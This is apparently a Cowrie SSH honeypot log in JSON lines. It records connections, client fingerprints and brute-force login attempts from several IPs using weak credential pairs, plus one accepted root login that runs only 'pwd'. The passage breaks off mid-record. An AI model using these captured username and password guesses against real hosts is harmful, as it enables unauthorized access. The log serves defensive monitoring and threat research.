{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57329,"dst_ip":"1.2.3.4","dst_port":22,"session":"148a4b9c6243","protocol":"ssh","message":"New connection: 212.227.125.160:57329 (1.2.3.4:22) [session: 148a4b9c6243]","sensor":"my-vps","timestamp":"2025-08-28T14:15:05.469455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:15:05.470463Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:15:05.560407Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:15:05.990346Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd1234","message":"login attempt [user/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:15:07.073855Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.login.failed","username":"user","password":"ghbdtn","message":"login attempt [user/ghbdtn] failed","sensor":"my-vps","timestamp":"2025-08-28T14:15:08.160486Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc123","message":"login attempt [user/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:15:09.249193Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd123","message":"login attempt [user/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:15:10.332619Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:15:11.415513Z","src_ip":"212.227.125.160","session":"148a4b9c6243"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52046,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e7699f69927","protocol":"ssh","message":"New connection: 212.227.125.160:52046 (1.2.3.4:22) [session: 7e7699f69927]","sensor":"my-vps","timestamp":"2025-08-28T14:15:24.265507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:15:24.270257Z","src_ip":"212.227.125.160","session":"7e7699f69927"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:15:24.429722Z","src_ip":"212.227.125.160","session":"7e7699f69927"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"1234567","message":"login attempt [fedora/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:15:25.081849Z","src_ip":"212.227.125.160","session":"7e7699f69927"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:15:26.460299Z","src_ip":"212.227.125.160","session":"7e7699f69927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44296,"dst_ip":"1.2.3.4","dst_port":22,"session":"65eefee22f0c","protocol":"ssh","message":"New connection: 212.227.125.160:44296 (1.2.3.4:22) [session: 65eefee22f0c]","sensor":"my-vps","timestamp":"2025-08-28T14:16:03.596467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:16:03.597593Z","src_ip":"212.227.125.160","session":"65eefee22f0c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:16:03.765049Z","src_ip":"212.227.125.160","session":"65eefee22f0c"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"123456","message":"login attempt [redhat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:16:04.271036Z","src_ip":"212.227.125.160","session":"65eefee22f0c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:16:05.440678Z","src_ip":"212.227.125.160","session":"65eefee22f0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34254,"dst_ip":"1.2.3.4","dst_port":22,"session":"486e063b18c7","protocol":"ssh","message":"New connection: 212.227.125.160:34254 (1.2.3.4:22) [session: 486e063b18c7]","sensor":"my-vps","timestamp":"2025-08-28T14:16:39.497170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:16:39.498196Z","src_ip":"212.227.125.160","session":"486e063b18c7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:16:39.660015Z","src_ip":"212.227.125.160","session":"486e063b18c7"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"password","message":"login attempt [redhat/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:16:40.147275Z","src_ip":"212.227.125.160","session":"486e063b18c7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:16:41.311194Z","src_ip":"212.227.125.160","session":"486e063b18c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45095,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c3493ea4d28","protocol":"ssh","message":"New connection: 212.227.125.160:45095 (1.2.3.4:22) [session: 7c3493ea4d28]","sensor":"my-vps","timestamp":"2025-08-28T14:17:01.817071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:17:01.823182Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:17:01.885268Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.login.failed","username":"admin","password":"3141","message":"login attempt [admin/3141] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:02.213508Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.login.failed","username":"admin","password":"3110","message":"login attempt [admin/3110] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:03.277138Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31081994","message":"login attempt [admin/31081994] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:04.340227Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31071981","message":"login attempt [admin/31071981] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:05.403450Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31051984","message":"login attempt [admin/31051984] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:06.465499Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:17:07.527780Z","src_ip":"212.227.125.160","session":"7c3493ea4d28"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:17:09.975654Z","src_ip":"212.227.125.160","session":"09406f7aa1a1"}
{"eventid":"cowrie.session.closed","duration":180.10695242881775,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:17:09.978598Z","src_ip":"212.227.125.160","session":"09406f7aa1a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44298,"dst_ip":"1.2.3.4","dst_port":22,"session":"09bc0972b7c2","protocol":"ssh","message":"New connection: 212.227.125.160:44298 (1.2.3.4:22) [session: 09bc0972b7c2]","sensor":"my-vps","timestamp":"2025-08-28T14:17:14.593191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:17:14.594126Z","src_ip":"212.227.125.160","session":"09bc0972b7c2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:17:14.770117Z","src_ip":"212.227.125.160","session":"09bc0972b7c2"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"123456789","message":"login attempt [redhat/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:15.300368Z","src_ip":"212.227.125.160","session":"09bc0972b7c2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:17:16.479397Z","src_ip":"212.227.125.160","session":"09bc0972b7c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45486,"dst_ip":"1.2.3.4","dst_port":22,"session":"db2ae415e8fd","protocol":"ssh","message":"New connection: 212.227.125.160:45486 (1.2.3.4:22) [session: db2ae415e8fd]","sensor":"my-vps","timestamp":"2025-08-28T14:17:49.267478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:17:49.270020Z","src_ip":"212.227.125.160","session":"db2ae415e8fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:17:49.432778Z","src_ip":"212.227.125.160","session":"db2ae415e8fd"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"12345","message":"login attempt [redhat/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:17:49.923158Z","src_ip":"212.227.125.160","session":"db2ae415e8fd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:17:51.088281Z","src_ip":"212.227.125.160","session":"db2ae415e8fd"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":39331,"dst_ip":"1.2.3.4","dst_port":22,"session":"df59c100b701","protocol":"ssh","message":"New connection: 186.225.142.90:39331 (1.2.3.4:22) [session: df59c100b701]","sensor":"my-vps","timestamp":"2025-08-28T14:17:59.994947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:18:00.516857Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:18:00.517498Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.login.success","username":"root","password":"100851","message":"login attempt [root/100851] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:18:02.721245Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:18:03.457351Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T14:18:03.459596Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:18:03.729800Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:18:03.768255Z","src_ip":"186.225.142.90","session":"df59c100b701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54656,"dst_ip":"1.2.3.4","dst_port":22,"session":"810e990a4bd9","protocol":"ssh","message":"New connection: 212.227.235.229:54656 (1.2.3.4:22) [session: 810e990a4bd9]","sensor":"my-vps","timestamp":"2025-08-28T14:18:15.144628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:18:15.186478Z","src_ip":"212.227.235.229","session":"810e990a4bd9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 